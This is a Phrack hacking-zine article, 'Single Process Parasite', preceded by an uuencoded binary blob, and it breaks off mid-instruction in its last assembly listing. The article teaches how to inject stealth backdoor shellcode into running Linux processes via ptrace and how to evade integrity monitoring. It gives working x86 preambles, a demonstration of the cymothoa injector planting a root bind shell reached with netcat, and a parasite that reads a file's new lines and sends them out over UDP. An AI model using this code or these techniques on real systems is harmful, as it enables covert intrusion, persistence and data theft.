M\:M0?05WZ8+U.?T1OVRKKYK>#JLC\?]C^'^]ZU+@^PL[3IB-N^2XTCZ^PB4X MO;&P,W#[)F9?LCY;BH_0P_A`O^B3@_GD`(]#XLD$;[>)!F'[A"AY&R47E`R! M$.%03S`GZ&5+/P*_N[+AI-$P3[SZQ,/8JGPB;SSA/X`,)&VLIFV4*5"V<)IK M3EUQ_4J(OY8*$E?4`AS`CV^;`H]6"SP./)>U"9.Y8B-AWD:8"T)@>>#R//:% M)A;]MI#%EL<+1^0DMIBFBL8M%6E1D]2G+]I8+R:31L^6;82EE)&Y7(IFVGO6 M5Y26TJ\@=L7,`CV4^"^1V[-)&7C.'Q`HS*AM0/OJ1,IQ0.PR(+:OY*#8F2OV MJ"FP;PM<@=.FF>&M=H;':#X:G+:;&MXN;\H#\OIC)2COR%1P;%60A"R4(`-, M#JI!R$D)I!7/*R5DH=$2M+A[>XJU*3T5O[$4&+*^KBR9VW=9WG@S6X523I/3SMU[#-+GOR%X%G0S9ZI?PA>^W)7P3D7V6PO2I2 M5P/E/:VT(WL1/]12KY(]:+1=SHMXM?"M9ML3OG2$+WB@"]OMMOOR%UEH[(1- M^&K+%;;FGB*RU8IHM>=>%?YKBQL?8]WM:2!>C8.F>C+01Z.:MNI\?547TIWNME MM5A6U]5<'DQ>$5``.C#"79A9Q>2A1W5LU_[Z=GJYN*#&Q3=>FK"J9,LMT!\`R>"`R'DBP[G"Y/KZ4G]H;X^Y/Q M),"K"]"<;"V/82,DZI'5K=G>/BOEF2(^?[1+ESR/P$*+F@[X9CT1RVF9#5=9 MX9GU\;HY4CMB6R(G7D>(SO@VA5D?P#]/*X7W!8>'T^NCNF8WT]E%13=^Z')C M_VAO+U-^SX[K-%;;7Y^NLRW&X\%NRU,]^5B#8?#?:^/WWV3WQWU2T/U9Q2<4 MFS5>9F@Z=^.M3/A#"'`T9(V./.EC"=SI&4-G]!^-[8$&!\[`]O]\_T<#<4.OMSPP+F\)D-# MZWQO7PTL?'?:.7#_:+[.N[ M!1;F`U[[Z'TPW+3[!_^Y#SSM]=_UT;)>W%P_>AS(^\9_S,LBYN)OB/_'N_B/ M3Y+:^A\NYVXO/C]:&W?T?Y8F,:[_.<]2BO^8E7G6K?^?(GWQEQ/E,@0_E!#<$F.ZB=$PP\@@*GQ,T$9=P M[ZFHFQ/Z$^(1E83&E,C@#KDHAG]R@DP"N"*`3TIDE(PRFHCEZ:%X3:9B17TU M/\0E$:HC5>$@5,B)3`;MR*R`!2JH"@1UD:%+5-`6+@,BR']U`!A.`%:1_)=4 M/);834)8^2^A5J6D):&.*%&X6`4I`/4OVI7_HL(1,1_Y!KD.3ZAC0=\C`[T% MW0"509<(X@AT4I)Z@#]0%;1;$`)_!)U94+^""-#'P!KTMV@R0FA_TCWJ.R7N MH4^`.\2)D@A;B83CBBDZ`D!R(9P5=2SH##H9=)%CE`%1#(W1B`2UPN@$=>4$ M;Q7!2.$T:,8T?D"A.08```60^&H5`[*71L\J.Y&!H4"/O#3Y,J8+=D%ALG-B M(>56QGS!4BP#WJ>O[I<%:? M]]\-=C#[K7B;A6"WB*!Q"XO=V^5T?EKU+ZJY(!I,D`H*ZV;ACFX/",Y7$>#) M\`E[)]:S<*6\=DLD)_3%N^UZ?ES=]F\W$:G`JKX740N'RL)5?7R?APRO7D)%:VMK7ZM"L6H& M9T^\E8E>M["*EA#,@``(CPIZ:.+ZXP4@3XAO#[;!@"TL%*W7^W'4^X(^(K`F MN685JM^S"$7+H`I)6-,OJI84B,\>(+'(F&QQ(JG9YKYXF0V@#3Q!0F)5Y*7; MQ_]"(PA#4,]/]]?7)6^@4X"A@(\^H-K![T;X=-X7PQ-^R4=$0^OOY^NJ^#D; MH8>N10&\K!^LP]+:9*P]/QZN"6KIOE)O[O.[JI@,UZ/(K@(W4D@UE$L2DCO? M#MQH3/`K5H^;A="\CL$ABN1X*3)]VUPPNCEA/[#]=9DA-:6?PGW<>B'=G+WQ MIZE06Y)(C3\F)LR#6]%%$+S1;NWMU_T?!HT6U>.#79?Z71PD/=A)$SH`?X>? M[W:VQ>4[U&R-)Q#O8O56#"@/-+9(9"8"P?=4Z^\!!XXA/OL/?__F]2L:_#H/ M_(PD+`_..OEC?^'J&-._;_ M>9RF8OV?%SS/XJQ(Q?J_B(MN__])4G5;'6V=P%STT^S5ZV^C&=N(;T=Q-BK2 M-]&2Q7'K_Z((M@@OKDY/,2P!3F5X?=3)AP\)^/T,/BCWL=JO^&OY\#/,BV@> M[,.O/=QI$C8?2B]A6J(-&;;F[8;#N=OS8]C+/DAR"DR%%_BA$C6S]I]=[G%P M&80)4M7S_N9GVH[')LZA"4U^#EM=!=[;QU*<%WL]\^C[&WA2T]>&7A.1,\%0 ML++A'DIL#/JHA$W![P:PN?GL<@/.0N/-9_7FL_,-51,UO;D)/\0TXG"`G$O6 MD0()7/E^'5H"7@(5$BF"7W=%L5(QL+$90;G;:R=*?UO2$'[?_*$ M]K],T/XG<5ZF28+V/R\Z^_\4Z='L_\G=]C\>\7R\:@)(TGM-`"?WG0!&GOUG M[&<`,+BZW8%UZR[[B@)XZ&?%?R]_T^R`!T"//3OP\I&G!P@KVDT/7;)3T/XO MG\[^YTFNUO\EG?\4,"5T]O\)TJ/9_^5][+^8UO-[VG\K,$EH'EBJ>2"?M,\% M0V9F`SNVR2#2.Y'6U`">,B`%S0W?X!$TP(@Z\X,YQ.8]94CGSE0QQ^\.9ZM3 M3RAVICUWZ+9WK,;EWU\KK)T@(^+7W*G:GHFLF9:*,CC_+Y.DH//?M.#=^>^3I'_C M_J?)NYS>G#DY:[0;M!8UW(M-?$H?U*$W^?]DFVQ/A8]'PT& M`]C!]ZZ8PN+H($EQMA'6UK^!.B"OG&&HA`=+DF!)&BS)@B5YL*0(EI3!DE&P M9!R6=(42PEK@837PL!YX6!$\K`D>5@4/ZX*'E<'#VDC"VDA6C`G0!J"#^U'H M8!#R+#@(Z^`@K(.#L`X.PCHX".O@(*R#@[`.#L(Z.`CKX""L@X.P#@_".CP( MZ_`@K/4@U`$P`C?@VX,$ROB8@^AG%O*C3W>UTW;"0Q[\A4T4GP6J`OP#=6G\ M=1#\8&01Q2'$`&Z(7F4(`Q#=Z4X^K*Y;7=5?#"6PT$+> M*`7_13C5)/?&R\E!/0>/1E7(=2&7A=P4)KHPD86)*4QU82H+4U.8Z<),%F:F M,->%N2S,36&A"PM96)C"4A>6LK"<*/G)TZ@O':-`[`'[44Q0**-R+05"'!K& MA8K>!J@./(X"E26ZLM2MC-R2Z+U1=4@_=%,/M2B]GQ0+A<<"3^[@(=,\Y$$> M>+R2B<)F@CQE'1;2.U@H-`MEF`4>9`%:=!@P#V6F92RZKJ6[WY>6%Z_D"L(2 M0=STY7+*%AA@CEU_!$>'?WZL\$E%5<]/+D36<;T$^"L(QB`(RAZ\/^=!9P\=%0'!'D'9;;*L^;52?>-5[OG'>R!KX/6H@$C1OHP9O M9F@9A\(V[O(&=]DJ[KP1UV!MY+.6V,[GWHA;J;:RP5AQ#[59([&AMX0[(['M MZ&>U$1@F8$VHOQL5B&]_*`$6?;RKZ MZZP^/9/`M2T1<3?@NAU$M5((BRK$Z+=L8/PUMCC>@Q&DW^XZ84#\,`M.8\H9 M!\!3X06`$.@QPL"*GWV^MU47]A?=4$O_-A98T.&T)L"VY+J`?J#'AEPP0*NJ M$'\,!@IY<[9&PZ.526XBO[5@EK%*K:?*&@) M%TZJ;P?`=X,30BAQ$RE4B*9H4`Z*T(PWD-,3TZK M=BM#2ZM\[A!K%F65,2'Q1J.1TNES!ZO6+K@G]TWF%>_NT*HG--U[C$/FC\SN M.)'3\-"T(SW:T0%J*U!A2^@?'Q;Z50V&@S"ZR1-1@XY>S%G1?6:)_,?:T#+NJ^QF#*L9JH M$%I6O1=\FWU_-@7W3(HR?T'.-K/JYJ>JFF/FV[^A^^G?__$=C:'K__$T^JZ> M?]!/-*B;BG0#G8$WK#!+H@,QA(/XMXR%%:B-X,;W%.:I9P.%+P>/#^>,%S(84@0`/S&2'57)SNP M#*(>;>6I9]:B+B/L?$@-M[=U_8[H9Q;Q_!-`W@.:-*T.$?!\IH92NLW>@'OKQ>>A M]%6&9DV#-_5EQ::XN*PQ^M>Q#]@^TW37+B&-(7NU)%[&>G-_9-FAIKJ,U@_H M]9S`828X/F^>#^F30OQ%"Q?OG9.*S+;9WUY_CX@`T:KH+TVCU%C8_-%G+/^? MDX?_@D[23XS_6W`>&_Q?GN#Y7UIVYW]/D1YZ_K=VL@HF6%T:!3`/L8BNQ!O8 M#E3"S.XU()4\"-]%[Z)_".((B^6"0ON(OPKBH^[VF.$C_M_0_OC(HPO5QUW\ MUC!X\6A7,[<*0=@0A5I,$D.T"CO8$&5GO0!58:CREX(JL+D_\S;W:8-I1AB' M)[1;_V%R`/V,D*^T$1K;^U62CBLZ;J&HFOU5J-/;AS/PAZH*C&TCLJR&7KS@ MB<64WGL[H?,`V:;$>&TPE2J"]#Y,N?*DFAF"-Q4C@:?6PR1"RW:Z!P]W(F$% MM6@@TZA%TYEB-ENMZ5S1Y0\7*K,TC`^"5)DG5>%+-0I)-7:E&D?!KBH4TT6@ MJTI%4#YT(UMH%Y"Y3?B80!-%()_21Q4*J18GH4D&JL",:3R0.% M*EJ$*CRA>!P\2E'"<$\8'NXCKM]U'@?DX>8UO]=[[CY<>J^4D*BTG_4.9JYK MUI3'LA&NN6I:*]J:;WF1S!Y[B^FZPVIQ\S+XZC.LX2D"(^-E\;C*?,E'PERZ MMNQ.G?LRINXX8`U;UG)0$@=%'3FBMM@T[P''MMTIJFOA'BQJYEHEV[S1J8F< MD8V@25#0L=NG#2NWRLRIPZ0@IZ[->["?=5ONCY[(N]2E+G6I2UWJ M4I>ZU*4N=:E+7>I2E[K4I2YUJ4M=ZE*7NM2E+G6I2UWJ4I>ZU*4N=:E+7>K2 ,?TWZ/VX96&``\``` ` end --[ EOF ============== Page 9/17 ============== ==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x09 of 0x13 |=-----------------------------------------------------------------------=| |=---------------------=[ Single Process Parasite ]=---------------------=| |=----------------=[ The quest for the stealth backdoor ]=---------------=| |=-----------------------------------------------------------------------=| |=--------------------------=[ by Crossbower ]=--------------------------=| |=-----------------------------------------------------------------------=| Index ------[ 0. Introduction ------[ 1. Brief discussion on injection methods ------[ 2. First generation: fork() and clone() ------[ 3. Second generation: signal()/alarm() ------[ 4. Third generation: setitimer() ------[ 5. Working parasites ------------[ 5.1 Process and thread backdoor ------------[ 5.2 Remote "tail follow" parasite ------------[ 5.3 Single process backdoor ------[ 6. Something about the injector ------[ 7. Further readings ------[ 8. Links and references ------[ 0. Introduction In biology a parasite is an organism that grows, feeds, and live in a different organism while contributing nothing to the survival of its host. (There is another interesting definition that, even if it's less relevant, I find funny: a professional dinner guest, especially in ancient Greece. >From Greek parastos, person who eats at someone else's table, parasite : para-,beside; stos, grain, food.) So, without digressing too much, what do we mean by "parasite" in this document? A parasite is simply some executable code that lives within another process, but that was injected after its loading time, by a third person/program. Any process can become infected quite easily, using standard libraries provided by operating systems (we will use process trace, ptrace [0]). The real difficulty for the parasite is to coexist peacefully with the host process, without killing it. For "death" of the host we also intend a situation where, even if the process remains active, it is no longer able to work properly, because its memory has been corrupted. The of goal this document is to create a parasite that live and let live the host process, as if nothing had happened. Starting with simple techniques, and and gradually improving the parasite, we'll reach a point where our creature is scheduled inside the process of the host, without the need of fork() or similar calls (i.e. clone()). An interesting question is: why a parasite is an excellent backdoor? The simplest answer is that a parasite hides what is not permitted in what is allowed, so that: - it's difficult to detect using conventional tools - it's more stable and easy to use than kernel-level rootkits. If the target system has security tools that automatically monitor the integrity of executable files, but that do not perform complete audits of memory, the parasite will not trigger any alarm. After this introduction we can dive into the problematic. If you prefer practical examples, you can "jump" to paragraph 5, which shows three different types of real parasite. ------[ 1. Brief discussion on injection methods To separate the creation of the shellcode from the methods used to inject it into the host process, this section will discuss how the parasite is injected (in the examples of this document). Unlike normal shellcode that, depending on the vulnerability exploited, can not contain certain types of characters (e.g. NULLs), a parasite has no particular restrictions. It can contain any character, even NULL bytes, because ptrace [0] allows to modify directly the .text section of a process. The first question that arises regards where to place parasitic code. This memory location must not be essential to the program, and should not be invoked by the code after the start (or shortly after the start) of the host process. We can use run-time patching, but it's complicated technique and makes it difficult to ensure the correct functioning of the process after the manipulation. It is therefore not suitable for complex parasites. The author has chosen to inject the code into the memory range of libdl.so library, since it is used during the loading stage of programs but then usually no longer necessary (more info: [1][2]). Another reason for this choice is that the memory address of the library, when loaded into the process, is exported in the /proc filesystem. You can easily see that by typing: $ cat /proc/self/maps ... b7778000-b777a000 rw-p 00139000 fe:00 37071197 /lib/libc-2.7.so b777a000-b777d000 rw-p b777a000 00:00 0 ... b7782000-b779c000 r-xp 00000000 fe:00 37071145 /lib/ld-2.7.so <--- ... Libdl is mapped at the range b7782000-b779c000 and is executable. The injected starting at the initial address of the range is perfectly executable. Some considerations about this method: if the infected program uses dlopen(), dlclose() or dlsym() during its execution, some problems could arise. The solution is to inject into the same library, but in unused memory locations. (From the tests of the author the initial memory locations of the library are not critical and do not affect the execution of programs.) There are other problems on linux systems that use the grsec kernel patch. Using this patch the text segment of the host process is marked read/execute only and therefore will not be writable with ptrace. If that's your case, Ryan O'Neill has published a very powerful algorithm [3] that exploits sysenter instructions (used by the host's code) to execute a serie of system calls (the algorithm is able to allocate and set the correct permission on a new memory area without modifying the text segment of the traced process). I recommend everyone read the document, as it is very interesting. The other premise, I want to do in this section, regards the basic informations the injector (the program that injects the parasite) must provide to the shellcode to restore the execution of the host program. Our implementation of the injector gets the current EIP (Instruction Pointer) of the host process, push it on the stack and writes in the EIP the address of the parasite (injected into libdl). The parasite, in its initialization part, saves every register it uses. Then, at the end of its execution, every modified register is restored. A simple way to do this is to push and pop the registers with the instructions PUSHA and POPA. After that, a simple RET instruction restores the execution of the host process, since the its saved EIP is on the top of the stack. %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<% parasite_skeleton: # preamble push %eax # save registers push %ebx # used by the shellcode # ... # shellcode # ... # epilogue pop %ebx # restore modified registers pop %eax # ... ret # restore execution of the host %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<% Another very useful information the injector provides to the shellcode, is the address of a persistent memory location. In the case of this document, the address is also taken from /proc/pid/maps: ... b7701000-b771c000 r-xp 00000000 08:03 1261592 /lib/ld-2.11.1.so b771c000-b771d000 r--p 0001a000 08:03 1261592 /lib/ld-2.11.1.so b771d000-b771e000 rw-p 0001b000 08:03 1261592 /lib/ld-2.11.1.so <-- ... The range b771d000-b771e000 has read and write permission and it's suitable for this purpose. Other techniques exists to dynamically create writable and executable memory locations, such as the use of mmap() in the host process. But these techniques are beyond the scope of this article and will not be analyzed here. Since the necessary premises have been made, we can discuss the first generation of our stealth parasite. ------[ 2. First generation: fork() and clone() The simplest idea to allow the host process to continue its execution properly and, at the same time, hide the parasite, is the use of the fork() syscall (or the creation of a new thread, not analyzed here). Using fork() the process is splitted in two: - the parent process (the original one) can continue its normal execution - the child process, instead, will execute the parasite An important thing to note, is that the child process inherits the parent's name and a copy of its memory. This means that if we inject the parasite in the process "server1", another process "server1" will be created as its child. Before the injection: # ps -A ... ... 5478 ? 00:00:00 server1 ... After the injection: # ps -A ... ... 5478 ? 00:00:00 server1 5479 ? 00:00:00 server1 ... If the host process is carefully chosen, the parasite will be very hard to detect. Just think of some network services (such as apache2) that generate a lot of children: a single child process is unlikely to be detected. The fork parasite can be implemented as a preamble preceding the real shellcode: %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<% fork_parasite: push %eax # save %eax value (needed by parent process) push $2 pop %eax int $0x80 # fork test %eax, %eax jz shellcode # child: jumps to shellcode pop %eax # parent: restores host process execution ret shellcode: # append your shellcode here # ... # ... %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<% The preamble simply makes a call to fork(), analyzes the results, and decides the execution path to choose. With this implementation, any existing shellcode can be turned into a parasite: it's responsibility of the injector to concatenate the parts before inserting them in the host. A very similar technique uses clone() instead of fork(). We can consider clone() a generalization of the fork() syscall through which it's possible to create both processes and threads. The difference is in the options passed to the syscall. A thread is generated using particular flags: - CLONE_VM the calling process and the child process run in the same memory space. Memory writes performed by the calling process or by the child process are also visible in the other process. Any memory mapping or unmapping performed by the child or the calling process also affects the other process. - CLONE_SIGHAND the calling process and the child process share the same table of signal handlers. - CLONE_THREAD the child is placed in the same thread group as the calling process. The CLONE_THREAD flag is the most important: it is what distinguishes what we call the "process" from what we call "thread" at least on linux systems. Let's see how the clone() preamble is implemented: %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<% clone_parasite: pusha # save registers (needed by parent process) # call to sys_clone xorl %eax, %eax mov $120, %al movl $0x18900, %ebx # flags: CLONE_VM|CLONE_SIGHAND| # CLONE_THREAD|CLONE_PARENT int $0x80 # clone test %eax, %eax jz shellcode # child: jumps to shellcode popa # parent: restores host process execution ret shellcode: # append your shellcode here # ... # ... %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<% The code is based on the fork() preamble, and its behaviour is very similar. The difference is in the result. Before the injection (single threaded process): # ps -Am ... ... 8360 pts/3 00:00:00 server1 - - 00:00:00 - ... After the injection (an additional thread is created): # ps -A ... ... 8360 pts/3 00:00:00 server1 - - 00:00:00 - - - 00:00:00 - ... Surely the generation of a thread is more stealthy than the generation of a process. However there is a small disadvantage, if the parasite thread alters parts of the main thread can bring the host to a crash: the use of the resources, that are shared, must be much more careful. We have just seen how to create parasites executed as independent processes or threads. However, these types of parasites are not completely invisible. In some circumstances, and in the case of particular (monitored) processes, the generation of a child (process or thread) can be problematic or easily detectable. Therefore, in the next section, we will discuss in a different type of parasite/preamble, deeply integrated with its host. ------[ 3. Second generation: signal()/alarm() If we don't like the creation of another process to execute our parasite we need some kind of time sharing mechanism inside a single process (did you see the title of this document?) It's a scheduling problem: when a new process is created, the operating system takes care of assigning it time and resources necessary to its execution. If we don't want to rely on this mechanism, we have to simulate a scheduler within a single process, to allow a concurrent execution of parasite and host, using (usually) asynchronous events. When you think of asynchronous events in a Unix-like system, the first thing that comes to mind are signals. If a process registers a handler for a specific signal, when the signal is sent the operating system stops its normal execution and makes a (void function) call to the handler. When the handler returns, the execution of the process is restored. There are several functions provided by the operating system to generate signals. In this chapter we'll use alarm(). Alarm() arranges for a SIGALRM signal to be delivered to the calling process when an arbitrary number of seconds has passed. Its main limitation is that you can not specify time intervals shorter than one second, but this is not a problem in most cases. Our parasite/preamble needs to register itself as a handler for the signal SIGALRM, and renew the timer every time it is executed, to be called at regular intervals. This creates a kind of scheduler within a single process, and there is no the need to call fork() (or functions to create threads). Here is our second generation parasite/preamble: %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<% # signal/alarm parasite handler: pusha # alarm(timeout) xorl %eax, %eax xorl %ebx, %ebx mov $27, %al mov $0x1, %bl # 1 second int $0x80 schedule: # signal(SIGALRM, handler) xorl %eax, %eax xorl %ebx, %ebx mov $48, %al mov $14, %bl jmp schedule_end # load schedule_end address load_handler: pop %ecx subl $0x23, %ecx # adjust %ecx to point handler() int $0x80 popa jmp shellcode schedule_end: call load_handler shellcode: # append your shellcode here # ... # ... %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<% Of course the type of shellcode you can append to the preamble must be aware of the "alternative" scheduling mechanism. It must be able to split its operations between multiple calls, and must also not take too much time to run a single step (i.e. a single call), to not slow down the host program or overlap with the next handler call. In short, a call to the handler (our parasite), to work properly must last less than the timer interval. However, alert() is not the only function able to simulate a scheduler. In the next chapter we will see a more advanced function, which allows a more granular control of the execution of the parasite. ------[ 4. Third generation: setitimer() We've just arrived at the latest generation of the parasite. In the first part of the chapter we'll spend some time to analyze the function setitimer(), on which the code is based. The definition of the function is: int setitimer(int which, const struct itimerval *new_value, struct itimerval *old_value); As in the case of alarm(), the function setitimer() provides a mechanism for a process to interrupt itself in the future using signals. Unlike alarm, however, you can specify intervals of a few microseconds and choose various types of timers and time domains. The argument "int which" allows to choose the type of timer and therefore the signal that will be sent to the process: ITIMER_REAL 0x00 the most used timer, it decrements in real time, and delivers SIGALRM upon expiration. ITIMER_VIRTUAL 0x01 decrements only when the process is executing, and delivers SIGVTALRM upon expiration. ITIMER_PROF 0x02 decrements both when the process executes and when the system is executing on behalf of the process. Coupled with ITIMER_VIRTUAL, this timer is usually used to profile the time spent by the application in user and kernel space. SIGPROF is delivered upon expiration. We will use ITIMER_REAL because it allows the generation of signal at regular intervals, and is not influenced by environmental factors such as the workload of a system. The argument "const struct itimerval *new_value" points to an itimerval structure, defined as: struct itimerval { struct timeval it_interval; /* next value */ struct timeval it_value; /* current value */ }; struct timeval { long tv_sec; /* seconds */ long tv_usec; /* microseconds */ }; The last timeval structure, it_value, is the period between the calling of the function and the first timer interrupt. If zero, the alarm is disabled. The second one, it_interval, is the period between successive timer interrupts. If zero, the alarm will only be sent once. We'll set both structures at the same time interval. The last argument, "struct itimerval *old_value", if not NULL, will be set by the function at the value of the previous timer. We'll not use this feature. %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<% # setitimer parasite setitimer_hdr: pusha # sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL) xorl %eax, %eax xorl %ebx, %ebx xorl %edx, %edx mov $104, %al jmp struct_itimerval # load itimervar structure load_struct: pop %ecx int $0x80 popa jmp handler struct_itimerval: call load_struct # itimerval structure: you can modify the values # to set your time intervals .long 0x0 # seconds .long 0x5000 # microseconds .long 0x0 # seconds .long 0x5000 # microseconds # signal handler, called by the timer handler: pusha # signal(SIGALRM, handler) xorl %eax, %eax xorl %ebx, %ebx mov $48, %al mov $14, %bl jmp handler_end # load handler_end address load_handler: pop %ecx subl $0x19, %ecx # adjust %ecx to point handler() int $0x80 popa jmp shellcode handler_end: call load_handler shellcode: # append your shellcode here # ... # ... %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<% The usage of this preamble is similar to the previous (alarm) one, there is only the necessity of a fine-tuned timer: a compromise between the frequency of executions and the stability of the parasite, which must be able to carry out its operations in less time than a timer's cycle. You can work around this problem by transforming these preambles (including the preamble that makes use of alarm()) in epilogues, so that the timer starts counting only after the parasite has finished its operations. In fact we are going to see how this was implemented in the real parasites presented below. ------[ 5. Working parasites Here we come to the practical part. Three working parasites will be presented: one for each technique exposed in the theoretical part of the document. To inject the parasites the injector cymothoa [4] was used, written by the same author, and which already includes the codes presented in the article. Although it is possible, through various techniques, to inject shellcodes in processes, the download of the program is recommended to try the examples during the lecture. ------------[ 5.1 Process and thread backdoor Our first real parasite is a backdoor created by applying, to pre-existing shellcode, the fork() preamble. The shellcode used was developed by izik (izik@tty64.org) and is available on several sites [5]. For this reason will not be reported. The shellcode is a classic exploit shellcode: it binds /bin/sh to a TCP port and fork a shell for every connection. Using it aided by an injector, has several advantages: - The ability to configure its behavior. In this case the possibility to choose the port to listen on. - The possibility of keeping the host alive using a one of the preamble shown earlier. - Not having to worry about memory locations necessary to the execution and data storage, since they are automatically provided. Let's see in practice how this parasite works... First, on the victim machine, we must identify a suitable host process. In this example we will use an instance of cat, since it's really easy to check if it continues its execution after the injection. root@victim# ps -A | grep cat 1727 pts/6 00:00:00 cat We need this pid for the injection: root@victim# cymothoa -p 1727 -s 1 -y 5555 [+] attaching to process 1727 register info: ----------------------------------------------------------- eax value: 0xfffffe00 ebx value: 0x0 esp value: 0xbf81e1c8 eip value: 0xb78be430 ------------------------------------------------------------ [+] new esp: 0xbf81e1c4 [+] payload preamble: fork [+] injecting code into 0xb78bf000 [+] copy general purpose registers [+] detaching from 1727 [+] infected!!! root@victim# The process is now infected: we should be able to see two cat instances, the original one and the new one that corresponds to the parasite: root@victim# ps -A | grep cat 1727 pts/6 00:00:00 cat 1842 pts/6 00:00:00 cat If, from a different machine, we try to connect to the port 5555, we should get a shell: root@attacker# nc -vv victim 5555 Connection to victim 5555 port [tcp/*] succeeded! uname -a Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux whoami root At the same time, if we write a few lines in the console where the original cat is running, we should see the usual output: root@victim# cat test123 test123 foo foo The backdoor function properly: the two processes are running at the same time without crashing... The same backdoor can also be injected in a similar way using the clone() preamble, and thus running the parasite as a new thread instead of a new process. The command is similar, we only disable the fork() preamble and force clone() instead: root@victim# cymothoa -p 9425 -s 1 -y 5555 -F -b [+] attaching to process 9425 register info: ----------------------------------------------------------- eax value: 0xfffffe00 ebx value: 0x0 esp value: 0xbfb4beb8 eip value: 0xb78da430 ------------------------------------------------------------ [+] new esp: 0xbfb4beb4 [+] payload preamble: thread [+] injecting code into 0xb78db000 [+] copy general purpose registers [+] detaching from 9425 [+] infected!!! If we execute ps without special flags we now see only one process: root@victim# ps -A | grep cat 9425 pts/3 00:00:00 cat But with the option -m we see an additional thread: root@victim# ps -Am ... 9425 pts/3 00:00:00 cat - - 00:00:00 - - - 00:00:00 - ... ... Using netcat on the port 5555 of the victim machine works as expected. Some notes on the proper use of the fork() and clone() preambles: - This preamble is compatible with virtually any existing shellcode, without any modification. It can be used to easily transform into parasitic code what you have already written. In the case of clone() preamble the situation is slightly more critical because there is the possibility that the parasite thread interferes with the host thread. However, widespread shellcodes are usually already attentive to these issues, and should not cause problems. - It is better to inject the parasite into servers that generate many child processes. Some of those tested by me are apache2, dhclient3 and, in the case of a desktop system, the processes of the window manager. It's hard to find a needle in a haystack, and it is difficult to tell a single parasite from dozens of apache2 processes ;) ------------[ 5.2 Remote "tail follow" parasite Have you ever used tail with the "-f" (follow) option? This mode is used to monitor text files, usually logs, to see in real time the new lines added by other processes. Tail accepts as option a sleep interval, a waiting time between a control of the file and another. It's therefore natural, when writing a parasite with the same function, to use a preamble that allows a precise control of time: the setitimer() preamble. This is the code of this new parasite... It is more complex than the previous codes. After the source there will be a brief explanation of its operations, and finally an example of its practical use. %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%< # # Scheduled tail setitimer parasite # # # Preamble # setitimer_hdr: pusha # sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL) xorl %eax, %eax xorl %ebx, %ebx xorl %edx, %edx mov $104, %al jmp struct_itimerval load_struct: pop %ecx int $0x80 popa jmp handler struct_itimerval: call load_struct # these values are replaced by the injector: .long 0x0#53434553 # seconds .long 0x5343494d # microseconds .long 0x0#53434553 # seconds .long 0x5343494d # microseconds handler: pusha # signal(SIGALRM, handler) xorl %eax, %eax xorl %ebx, %ebx mov $48, %al mov $14, %bl jmp handler_end load_handler: pop %ecx subl $0x19, %ecx # adjust %ecx to point handler() int $0x80 popa jmp shellcode handler_end: call load_handler # # The shellcode starts here # shellcode: pusha # check if already initialized mov $0x4d454d50, %esi # replaced by the injector # (persistent memory address) mov (%esi), %eax cmp $0xdeadbeef, %eax je open_call # jump if already initialized # initialize mov $0xdeadbeef, %eax mov %eax, (%esi) add $4, %esi xorl %eax, %eax mov %eax, (%esi) sub $4, %esi open_call: # call to sys_open(file_path, O_RDONLY) xorl %eax, %eax mov $5, %al jmp file_path load_file_path: pop %ebx xorl %ecx, %ecx int $0x80 # %eax = file descriptor mov %eax, %edi # save file descriptor check_file_length: # call to sys_lseek(fd, 0, SEEK_END) mov %edi, %ebx xorl %eax, %eax mov $19, %al xorl %ecx, %ecx xorl %edx, %edx mov $2, %dl int $0x80 # %eax = end of file offset (eof) # get old eof, and store new eof add $4, %esi mov (%esi), %ebx mov %eax, (%esi) # skip the first read test %ebx, %ebx jz return_to_main_proc # check if file is larger # (current end of file > previous end of file) cmp %eax, %ebx je return_to_main_proc # eof not changed: # return to main process calc_data_len: # calculate new data length # (current eof - last eof) mov %eax, %esi sub %ebx, %esi # saved in %esi set_new_position: # call to sys_lseek(fd, last_eof, SEEK_SET) xorl %eax, %eax mov $19, %al mov %ebx, %ecx mov %edi, %ebx xorl %edx, %edx int $0x80 # %eax = last end of file offset read_file_tail: # allocate buffer sub %esi, %esp # call to sys_read(fd, buf, count) xorl %eax, %eax mov $3, %al mov %edi, %ebx mov %esp, %ecx mov %esi, %edx int $0x80 # %eax = bytes read mov %esp, %ebp # save pointer to buffer open_socket: # call to sys_socketcall($0x01 (socket), *args) xorl %eax, %eax mov $102, %al xorl %ebx, %ebx mov $0x01, %bl jmp socket_args load_socket_args: pop %ecx int $0x80 # %eax = socket descriptor jmp send_data socket_args: call load_socket_args .long 0x02 # AF_INET .long 0x02 # SOCK_DGRAM .long 0x00 # NULL send_data: # prepare sys_socketcall (sendto) arguments jmp struct_sockaddr load_sockaddr: pop %ecx push $0x10 # sizeof(struct_sockaddr) push %ecx # struct_sockaddr address xorl %ecx, %ecx push %ecx # flags push %edx # buffer len push %ebp # buffer pointer push %eax # socket descriptor # call to sys_sendto($11 (sendto), *args) xorl %eax, %eax mov $102, %al xorl 